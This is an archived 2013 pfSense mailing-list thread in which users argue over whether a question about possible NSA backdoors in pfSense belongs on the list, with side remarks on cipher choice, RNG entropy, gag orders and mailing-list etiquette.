Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 10/10/2013 09:38, Thinker Rix wrote: On 2013-10-10 01:13, Przemysław Pawełczyk wrote: On Thu, 10 Oct 2013 00:05:22 +0300 Thinker Rix thinke...@rocketmail.com wrote: Well, actually I started this thread with a pretty frank, straight-forward and very simple question. That's right and they were justified. Thank you! BTW, you pushed to the corner the (un)famous American hubris (Obama: US is exceptional.), that's the nasty answers from some. Yes, I guess I have hit a whole bunch of different nerves with my question, and I find it to be highly interesting to observe some of the awkward reactions, socioscientificly and psychologically. I have been insulted, I have been bullied, I have been called to self-censor myself and at the end some users virtually joined to give the illusion of a majority an muzzle me, stating, that my question has no place at this pfSense mailing list. Really amazing, partly hilarious reactions, I think. These reactions say so much about how far the whole surveillance and mind-suppression has proceeded already and how much it has influenced the thoughts and behavior of formerly free people by now. Frightening. Thinker Rix, you are not alone at your unease pressing you to ask those questions about pfSense and NSA. Thank you for showing your support openly! I too was surprised to see some activity on the pfsense list, after seeing only a few posts per week I checked today to find several dozen messages talking about a topic I have been concerned with myself - as a network security specialist, how much can I trust the firewalls I use, be they embedded devices, software packages, or 'hardware' from manufacturers. There are many on-topic things to discuss here: 1. Which Ciphers Transforms should we now consider secure (pfsense provides quite a few cipher choices over some other off the shelf hardware. 2. What hardware / software configuration changes can we consider to improve RNG and ensure that should we increase the bit size of our encryption, reduce lifetimes of our SAs that we can still ensure we have enough entropy in the RNG on a device that is typically starved of traditional entropy sources. This is so much on-topic, I am surprised that there has been a movement to call this thread to stop, granted - it may seem that the conversation may drift into a political one, with regard to privacy law etc... however, that is a valid sub-topic for a discussion list that addresses devices that are designed and implemented to safe-guard privacy. -- Regards, Giles Coochey, CCNP, CCNA, CCNAS NetSecSpec Ltd +44 (0) 8444 780677 +44 (0) 7983 877438 http://www.coochey.net http://www.netsecspec.co.uk gi...@coochey.net smime.p7s Description: S/MIME Cryptographic Signature ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Giles On 2013-10-10 12:39, Giles Coochey wrote: On 10/10/2013 09:38, Thinker Rix wrote: On 2013-10-10 01:13, Przemysław Pawełczyk wrote: On Thu, 10 Oct 2013 00:05:22 +0300 Thinker Rix thinke...@rocketmail.com wrote: Well, actually I started this thread with a pretty frank, straight-forward and very simple question. That's right and they were justified. Thank you! BTW, you pushed to the corner the (un)famous American hubris (Obama: US is exceptional.), that's the nasty answers from some. Yes, I guess I have hit a whole bunch of different nerves with my question, and I find it to be highly interesting to observe some of the awkward reactions, socioscientificly and psychologically. I have been insulted, I have been bullied, I have been called to self-censor myself and at the end some users virtually joined to give the illusion of a majority an muzzle me, stating, that my question has no place at this pfSense mailing list. Really amazing, partly hilarious reactions, I think. These reactions say so much about how far the whole surveillance and mind-suppression has proceeded already and how much it has influenced the thoughts and behavior of formerly free people by now. Frightening. Thinker Rix, you are not alone at your unease pressing you to ask those questions about pfSense and NSA. Thank you for showing your support openly! I too was surprised to see some activity on the pfsense list, after seeing only a few posts per week I checked today to find several dozen messages talking about a topic I have been concerned with myself - as a network security specialist, how much can I trust the firewalls I use, be they embedded devices, software packages, or 'hardware' from manufacturers. Exactly. The firewall is the neuralgic point of each of the networks that we administer. Thinking - and talking - about it's integrity is the most natural and most important thing on earth, IMO. There are many on-topic things to discuss here: 1. Which Ciphers Transforms should we now consider secure (pfsense provides quite a few cipher choices over some other off the shelf hardware. 2. What hardware / software configuration changes can we consider to improve RNG and ensure that should we increase the bit size of our encryption, reduce lifetimes of our SAs that we can still ensure we have enough entropy in the RNG on a device that is typically starved of traditional entropy sources. You made some highly relevant and interesting suggestions here, and I sincerely hope that a fruitful discussion will develop upon this so that we all can benefit of it! This is so much on-topic, I am surprised that there has been a movement to call this thread to stop, granted - it may seem that the conversation may drift into a political one, with regard to privacy law etc... however, that is a valid sub-topic for a discussion list that addresses devices that are designed and implemented to safe-guard privacy. This echoes my sentiments exactly! Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
This discussion about security/NSA/encryption IS important. Please go on. Von Samsung Mobile gesendet Ursprüngliche Nachricht Von: Giles Coochey gi...@coochey.net Datum:10.10.2013 11:39 (GMT+01:00) An: list@lists.pfsense.org Betreff: Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others? On 10/10/2013 09:38, Thinker Rix wrote: On 2013-10-10 01:13, Przemysław Pawełczyk wrote: On Thu, 10 Oct 2013 00:05:22 +0300 Thinker Rix thinke...@rocketmail.com wrote: Well, actually I started this thread with a pretty frank, straight-forward and very simple question. That's right and they were justified. Thank you! BTW, you pushed to the corner the (un)famous American hubris (Obama: US is exceptional.), that's the nasty answers from some. Yes, I guess I have hit a whole bunch of different nerves with my question, and I find it to be highly interesting to observe some of the awkward reactions, socioscientificly and psychologically. I have been insulted, I have been bullied, I have been called to self-censor myself and at the end some users virtually joined to give the illusion of a majority an muzzle me, stating, that my question has no place at this pfSense mailing list. Really amazing, partly hilarious reactions, I think. These reactions say so much about how far the whole surveillance and mind-suppression has proceeded already and how much it has influenced the thoughts and behavior of formerly free people by now. Frightening. Thinker Rix, you are not alone at your unease pressing you to ask those questions about pfSense and NSA. Thank you for showing your support openly! I too was surprised to see some activity on the pfsense list, after seeing only a few posts per week I checked today to find several dozen messages talking about a topic I have been concerned with myself - as a network security specialist, how much can I trust the firewalls I use, be they embedded devices, software packages, or 'hardware' from manufacturers. There are many on-topic things to discuss here: 1. Which Ciphers Transforms should we now consider secure (pfsense provides quite a few cipher choices over some other off the shelf hardware. 2. What hardware / software configuration changes can we consider to improve RNG and ensure that should we increase the bit size of our encryption, reduce lifetimes of our SAs that we can still ensure we have enough entropy in the RNG on a device that is typically starved of traditional entropy sources. This is so much on-topic, I am surprised that there has been a movement to call this thread to stop, granted - it may seem that the conversation may drift into a political one, with regard to privacy law etc... however, that is a valid sub-topic for a discussion list that addresses devices that are designed and implemented to safe-guard privacy. -- Regards, Giles Coochey, CCNP, CCNA, CCNAS NetSecSpec Ltd +44 (0) 8444 780677 +44 (0) 7983 877438 http://www.coochey.net http://www.netsecspec.co.uk gi...@coochey.net ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-10 15:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com mailto:alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org mailto:rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. Ian, that is *your* opinion. As you can see, others here have a quite different opinion and they find this topic to be highly relevant for pfSense. Luckily this is an open mailing list, where everyone can pick the topics to read that interest him, so why you don't just walk away from this discussion instead of losing any time in telling others how uninteresting you find *their* discussion? And you even dare to tell us to go elsewhere... Who do you think you are? You are either a kind of sadomasochist - reading all day all kinds of discussions that do not interest you and telling the participants of that discussion that they should go elsewhere because they do not discuss what you find interesting and relevant - or you simply do not know how to use a mailing list properly. I suggest you go learn how to use a proper news/mailing-list reader. Hint: Threaded mode. Cheers Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 10/10/2013 13:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com mailto:alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org mailto:rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. I tried to turn this back into a product support discussion in the last thread but sadly my comments were not among those cherry picked. This discussion does not suit the purpose of this list. I see a bunch of hard working people reacting to their product's integrity being continuously questioned despite having all questions answered, and a few entitled consumers who can't be bothered to figure out technology well enough to come to their own conclusion on its integrity.As well as a bunch of people that want this discussion to go someplace more appropriate. The concerned parties are not concerned enough to learn how to read code. So you're paranoid, just not paranoid enough to actually learn how to answer your own questions. Unless there is an issue someone is having making a VPN work or getting NAT running right, this is the wrong place to hold this discussion. If you're having an issue with this pfSense, networking protocols, or logical opertaion of the device, great! let's talk about it! I'm actually very good at these things, and I'd like to spend time helping people with network or network security related operational problems. Otherwise, please find the email addresses of all the people who shown an interest in participating in this discussion, and send an email out to that list of people to discuss it among yourselves. *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. The about list on the mailman page states: pfSense support and discussion list... This thread is clearly about discussing pfsense, therefore it is on-topic, I could equally take the stance, take your technical discussions to the dev list, however I am not the type of exclusive close-minded minded person that you appear to be. Please stop hijacking this thread. -- Regards, Giles Coochey, CCNP, CCNA, CCNAS NetSecSpec Ltd +44 (0) 8444 780677 +44 (0) 7983 877438 http://www.coochey.net http://www.netsecspec.co.uk gi...@coochey.net smime.p7s Description: S/MIME Cryptographic Signature ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-10 16:08, Giles Coochey wrote: On 10/10/2013 13:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com mailto:alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org mailto:rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. I tried to turn this back into a product support discussion in the last thread but sadly my comments were not among those cherry picked. This discussion does not suit the purpose of this list. I see a bunch of hard working people reacting to their product's integrity being continuously questioned despite having all questions answered, and a few entitled consumers who can't be bothered to figure out technology well enough to come to their own conclusion on its integrity.As well as a bunch of people that want this discussion to go someplace more appropriate. The concerned parties are not concerned enough to learn how to read code. So you're paranoid, just not paranoid enough to actually learn how to answer your own questions. Unless there is an issue someone is having making a VPN work or getting NAT running right, this is the wrong place to hold this discussion. If you're having an issue with this pfSense, networking protocols, or logical opertaion of the device, great! let's talk about it! I'm actually very good at these things, and I'd like to spend time helping people with network or network security related operational problems. Otherwise, please find the email addresses of all the people who shown an interest in participating in this discussion, and send an email out to that list of people to discuss it among yourselves. *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. This is *exactly* the way I feel about this whole sensation that we are witnessing here! Some reactions are truly incredible! The about list on the mailman page states: pfSense support and discussion list... Correct! But I guess those who waste our time by telling us we should shut up and walk away would like to rename the list to e.g. Happy shallow chatting of pfSense fan boys who never dare to ask any critical question about their beloved firewall-distro that they take to bed each night or something similar. Self-censorship in a security software forum when it comes to discuss the security level of the security software! It's absolutely crazy!! This thread is clearly about discussing pfsense, therefore it is on-topic, I could equally take the stance, take your technical discussions to the dev list, however I am not the type of exclusive close-minded minded person that you appear to be. Please stop hijacking this thread. FACK!! Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Thu, Oct 10, 2013 at 9:07 AM, Thinker Rix thinke...@rocketmail.comwrote: On 2013-10-10 15:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. Ian, that is *your* opinion. As you can see, others here have a quite different opinion and they find this topic to be highly relevant for pfSense. Luckily this is an open mailing list, where everyone can pick the topics to read that interest him, so why you don't just walk away from this discussion instead of losing any time in telling others how uninteresting you find *their* discussion? And you even dare to tell us to go elsewhere... Who do you think you are? You are either a kind of sadomasochist - reading all day all kinds of discussions that do not interest you and telling the participants of that discussion that they should go elsewhere because they do not discuss what you find interesting and relevant - or you simply do not know how to use a mailing list properly. I suggest you go learn how to use a proper news/mailing-list reader. Hint: Threaded mode. Cheers Thinker Rix Personal opinion is irrelevant! Here is my opinion of you. seriously? Who I think I am is a network security engineer. And I'm very good at what I do. I eat breathe and sleep network security, and I have tons of experience and expertise I'm willing to lend anyone. I do this free of charge, mostly in IRC, and occasionally even on this very mailing list. I'm still very interested in helping everyone, even hostile folks like yourself, with any technical problems they have. But you don't seem interested in that. -Ian ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
I rarely participate in public political discussions but I have to say something: In the United States if the government sent someonean NSL - they would not be allowed to comment. You have been told that already and have been told that to the best knowledge of the people involved, no other requests have been received. You have turned this into a political discussion and I think at least I do not care about your political views. Yes, we all know NSA is evil and no, most of us do not like it. Now, do you have a technical question on how to protect yourself from the evil spooks? If not, please go away, this is becoming boring. Yes, it is an open public list but it does not mean it is your outlet to vent and abuse others. My $.02 On Thu, Oct 10, 2013 at 04:23:20PM +0300, Thinker Rix wrote: On 2013-10-10 16:08, Giles Coochey wrote: On 10/10/2013 13:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com mailto:alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org mailto:rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. I tried to turn this back into a product support discussion in the last thread but sadly my comments were not among those cherry picked. This discussion does not suit the purpose of this list. I see a bunch of hard working people reacting to their product's integrity being continuously questioned despite having all questions answered, and a few entitled consumers who can't be bothered to figure out technology well enough to come to their own conclusion on its integrity.As well as a bunch of people that want this discussion to go someplace more appropriate. The concerned parties are not concerned enough to learn how to read code. So you're paranoid, just not paranoid enough to actually learn how to answer your own questions. Unless there is an issue someone is having making a VPN work or getting NAT running right, this is the wrong place to hold this discussion. If you're having an issue with this pfSense, networking protocols, or logical opertaion of the device, great! let's talk about it! I'm actually very good at these things, and I'd like to spend time helping people with network or network security related operational problems. Otherwise, please find the email addresses of all the people who shown an interest in participating in this discussion, and send an email out to that list of people to discuss it among yourselves. *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. This is *exactly* the way I feel about this whole sensation that we are witnessing here! Some reactions are truly incredible! The about list on the mailman page states: pfSense support and discussion list... Correct! But I guess those who waste our time by telling us we should shut up and walk away would like to rename the list to e.g. Happy shallow chatting of pfSense fan boys who never dare to ask any critical question about their beloved firewall-distro that they take to bed each night or something similar. Self-censorship in a security software forum when it comes to discuss the security level of the security software! It's absolutely crazy!! This thread is clearly about discussing pfsense, therefore it is on-topic, I could equally take the stance, take your technical discussions to the dev list, however I am not the type of exclusive close-minded minded person that you appear to be. Please stop hijacking this thread. FACK!! Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 10, 2013, at 9:08 AM, Giles Coochey gi...@coochey.net wrote: On 10/10/2013 13:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. I tried to turn this back into a product support discussion in the last thread but sadly my comments were not among those cherry picked. This discussion does not suit the purpose of this list. I see a bunch of hard working people reacting to their product's integrity being continuously questioned despite having all questions answered, and a few entitled consumers who can't be bothered to figure out technology well enough to come to their own conclusion on its integrity.As well as a bunch of people that want this discussion to go someplace more appropriate. The concerned parties are not concerned enough to learn how to read code. So you're paranoid, just not paranoid enough to actually learn how to answer your own questions. Unless there is an issue someone is having making a VPN work or getting NAT running right, this is the wrong place to hold this discussion. If you're having an issue with this pfSense, networking protocols, or logical opertaion of the device, great! let's talk about it! I'm actually very good at these things, and I'd like to spend time helping people with network or network security related operational problems. Otherwise, please find the email addresses of all the people who shown an interest in participating in this discussion, and send an email out to that list of people to discuss it among yourselves. *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. Some people value the S/N ratio of mailing lists. I believe the people asking for the discussion to be moved elsewhere are motivated by that. As to people trying to query very valid points, even if we take that on face value, what do you or they hope to accomplish by asking the pfSense project directly whether they have been approached by the NSA? The reporting around the leaked NSA Files has established that one of the major concerns is the legal apparatus that enables the NSA to approach companies whilst compelling those companies not to reveal the fact. So, it's highly likely that had the pfSense project been approached, part of that approach would have included a mandate not to tell anyone. So how could a definitive answer be obtained given that silence from the pfSense project COULD be interpreted to mean yes but doesn't definitively mean yes. Some people have posited ways of evading such gag orders (e.g., http://www.theguardian.com/technology/2013/sep/09/nsa-sabotage-dead-mans-switch), but, AFAIK, they have not been battle-tested in court. I am left wondering, therefore, what it would take for people to accept that pfSense is trustworthy in a good-faith sense? The original poster in this thread asked for a direct answer to a straightforward question and he got it, yet still he continues to pursue this thread. To what end? People are outraged at the NSA revelations, but the pfSense mailing list is not the appropriate place to be outraged at that. Go comment at the news outlets. Write your elected officials. Support the EFF and the likes. But what more can be accomplished on this mailing list? There was an attempt to redirect the thread to something more practical and focused on pfSense, e.g., what now could be considered best practices settings to use for encryption, but it doesn't appear to be gaining much traction vs. this thread. (Part of that might be due to the fact that not much practical information is available right now.) As I've pointed out, the original thread query has been answered definitively (twice now). The original poster has said that the availability of the source code for scrutiny is not sufficient, but it seems that ultimately that is all you have to go on in open source projects. It's not clear to me what response it would take to establish trustworthiness in pfSense for the original poster and the others that are apparently being led to to seriously reconsider the potential risk ... in continuing to use pfsense as a security tool. Maybe if we can establish that, we can finally wrap up this thread as far as pfSense is concerned and get back to a pfSense-focused mailing list. The about list on
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-10 16:52, Paul Mather wrote: On Oct 10, 2013, at 9:08 AM, Giles Coochey gi...@coochey.net mailto:gi...@coochey.net wrote: *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. Some people value the S/N ratio of mailing lists. I believe the people asking for the discussion to be moved elsewhere are motivated by that. Those people should just learn how to use a mailing list properly, before using one. A mailing list is *not* just I enter my daily use email address somewhere and receive emails. For participating properly at a mailing list you need a proper mail reader that is able to sort mail into conversation threads (https://en.wikipedia.org/wiki/Conversation_threading). Then you go and pick the threads that interest you and read them. And you ignore those, who do not interest you. Additionally it is advised to use an email address only for reading mailing lists. Of course anyone can use a mailing list as he desires, e.g. by just subscribing to a mailing list with his daily use email address and then get his daily use email inbox spammed with tons of unsorted and un-threaded email about all sorts of discussion topics that are of no interest to him. Everyone's own choice! But please: Those people should not complain about receiving tons of email that do not interest them. And of course they can't tell others to talk only about topics that are of their own interest, that is ridiculous. Full stop. The original poster in this thread asked for a direct answer to a straightforward question and he got it, yet still he continues to pursue this thread. To what end? E, as long as a wish?! There is no quota on how long any member of this list is allowed to discuss a topic, is there? If you are not interested, just do not read this THREAD. You don't use a conversation threaded email reader to participate to a mailing list? Not my problem, sorry. Go use one. See above. People are outraged at the NSA revelations, but the pfSense mailing list is not the appropriate place to be outraged at that. Sorry, this is not up to you to judge. I think that my question is very well related to pfSense and thus the mailing lists of pfSense is the right place to do so. And again: If you are not interested in this thread, DO NOT READ it. So simple actually?! Maybe if we can establish that, we can finally wrap up this thread as far as pfSense is concerned and get back to a pfSense-focused mailing list. You can switch *right at this very moment* to a discussion thread that is of more interest for you and there you go! Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 10, 2013, at 10:13 AM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-10 16:52, Paul Mather wrote: On Oct 10, 2013, at 9:08 AM, Giles Coochey gi...@coochey.net wrote: *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. Some people value the S/N ratio of mailing lists. I believe the people asking for the discussion to be moved elsewhere are motivated by that. Those people should just learn how to use a mailing list properly, before using one. A mailing list is *not* just I enter my daily use email address somewhere and receive emails. For participating properly at a mailing list you need a proper mail reader that is able to sort mail into conversation threads (https://en.wikipedia.org/wiki/Conversation_threading). Then you go and pick the threads that interest you and read them. And you ignore those, who do not interest you. Additionally it is advised to use an email address only for reading mailing lists. Thank you for the valuable information about how to use mailing lists. I first started using mailing lists back in the mid/late 1980s, on the JANET network (British academic network)---back when the Internet was made up of networks like ARPA, BITNET, UUCP, and the likes and (in my case) you needed to know the gateway machines that would let you reach those networks and had to incorporate that routing into the recipients e-mail address. I suspect those people you mention above actually know how to use a mailing list properly. I know I do. I also know the value of good S/N ratio on technically-focused mailing lists. Maybe if we can establish that, we can finally wrap up this thread as far as pfSense is concerned and get back to a pfSense-focused mailing list. You can switch *right at this very moment* to a discussion thread that is of more interest for you and there you go! Of course, you're right, and that is wise counsel because it reminds me of one of the golden rules of mailing lists: unwelcome threads persist only so long as people reply to them. (This is sometimes better known by the more insulting adage: Please don't feed the trolls! I'm loathe to employ that, though.) I thought I was making a reasonable point, but it seems as far as I'm concerned, this thread has passed the point of reasonableness. I'll leave it to you and your fellow concerned list members to continue mulling it over, and, in your case, to continue teaching your grandma to suck eggs when it comes to Netiquette. :-) Cheers, Paul.___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Paul. On 2013-10-10 18:42, Paul Mather wrote: Thank you for the valuable information about how to use mailing lists. You are welcome! ;-) I first started using mailing lists back in the mid/late 1980s, on the JANET network (British academic network)---back when the Internet was made up of networks like ARPA, BITNET, UUCP, and the likes and (in my case) you needed to know the gateway machines that would let you reach those networks and had to incorporate that routing into the recipients e-mail address. I love it when users try to show off with what internet dinosaurs their are, as soon as someone tries to teach them how to do something better.. Well, I am an Internet Dinosaur, too, with quite a comparable track record as you, so I am not all to impressed ;-) I suspect those people you mention above actually know how to use a mailing list properly. I know I do. Well, as it seems, most readers here *may know* how it should be done, but yet *don't do* it correctly, since it has shown that most users do just read all incoming mail unsorted and not threaded. While anybody has the right to do so - no one has the right to complain afterwards about drowning in mail that does not concern him. But awkwardly enough many users did complain. And I will not accept them blaming me for not using their mail readers correctly. I also know the value of good S/N ratio on technically-focused mailing lists. Every user will consider different things to be noise. I do not consider this thread to be noise - at all. You do. Just read another thread that appeals you more? Maybe if we can establish that, we can finally wrap up this thread as far as pfSense is concerned and get back to a pfSense-focused mailing list. You can switch *right at this very moment* to a discussion thread that is of more interest for you and there you go! Of course, you're right, and that is wise counsel It would have been a wise sentence, if it would have stopped here ;-) because it reminds me of one of the golden rules of mailing lists: unwelcome threads persist only so long as people reply to them. (This is sometimes better known by the more insulting adage: Please don't feed the trolls! I'm loathe to employ that, though.) I thought I was making a reasonable point, but it seems as far as I'm concerned, this thread has passed the point of reasonableness. FACK! The only difference is, that you consider me to be the troll (maybe because I backtalk without hesitation to those who try to muzzle and censor me?) - while I consider those to be the trolls, who do not contribute anything of value to the discussion but plainly interfere in this thread and bully the others to stop discussing about the topic, because they claim that it bores them - instead of just walking away. I'll leave it to you and your fellow concerned list members to continue mulling it over, and, in your case, to continue teaching your grandma to suck eggs when it comes to Netiquette. :-) Thanks so much ;-) As far as Netiquette is concerned, I am surprised how many of those computer geeks that participate at this mailing list are clueless about Netiquette, and the basic usage of mail readers, etc. Take for an example how many postings are not quoting correctly, but have text on top - full quote below which is a no-go in newsgroups and mailing lists... Cheers, Paul. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 10, 2013, at 5:42 PM, Paul Mather p...@gromit.dlib.vt.edu wrote: I first started using mailing lists back in the mid/late 1980s, You’re not the only one. :-) I too was entertained by the n00b trying to tell grandpa how to use email. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Dear Worried user, Since pfSense is opensource, please check the code and report back if there are any backdoors or nasty stuff in there. Thanks for being a conscientious user and not wanting to shift work onto others. Mehma On Wed, Oct 9, 2013 at 7:20 AM, Thinker Rix thinke...@rocketmail.comwrote: Dear pfsense-team, today I posted the following on your blog at http://blog.pfsense.org/?p=712 “Worried User Says: Your comment is awaiting moderation. October 9th, 2013 at 7:55 am Hi guys, I want to ask if you have been approached by any US government officials, such as NSA, FBI, etc. and been asked/ forced to include any backdoors, spyware, loggers, etc. into pfsense and if you did so. Thank you Worried User” Some minutes later I could see that my entry was not released to the public - but deleted by the moderator, without any further comment. Please take a stand to this. Regards ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ? Paul Kunicki Network Administrator SproutLoud Media Networks, LLC. 954-476-6211 ext.144 pkuni...@sproutloud.com On Wed, Oct 9, 2013 at 10:20 AM, Thinker Rix thinke...@rocketmail.comwrote: Dear pfsense-team, today I posted the following on your blog at http://blog.pfsense.org/?p=712 “Worried User Says: Your comment is awaiting moderation. October 9th, 2013 at 7:55 am Hi guys, I want to ask if you have been approached by any US government officials, such as NSA, FBI, etc. and been asked/ forced to include any backdoors, spyware, loggers, etc. into pfsense and if you did so. Thank you Worried User” Some minutes later I could see that my entry was not released to the public - but deleted by the moderator, without any further comment. Please take a stand to this. Regards ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Since pfSense is opensource, please check the code and report back if there are any backdoors or nasty stuff in there. Thanks for being a conscientious user and not wanting to shift work onto others. To be honest, I understand the question from the worried user, especially if his comment is held in moderation. I also understand your point though, since the software is OSS, it should be fairly easy to check for backdoors :) Regards, Peter ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 11:20:11AM -0400, Paul Kunicki wrote: I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ? Incorporated in the US, hence a legitimate target. http://blog.pfsense.org/?p=714 Howdy, If you’ve downloaded pfSense 2.1, you might have noticed that the footer has changed. What used to say “BSD Perimeter” now says “ESF”. In early Spring it became apparent that we should consider a reorganization of the company. BSD Perimeter is still incorporated in Kentucky, but all of the directors and owners live in Texas. Re-incorporating gave us chance to clean up a few issues, and to change the name, signaling a break with the past. If you're really paranoid, you can always export the pf rules, and run it on a headless FreeBSD or OpenBSD box. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
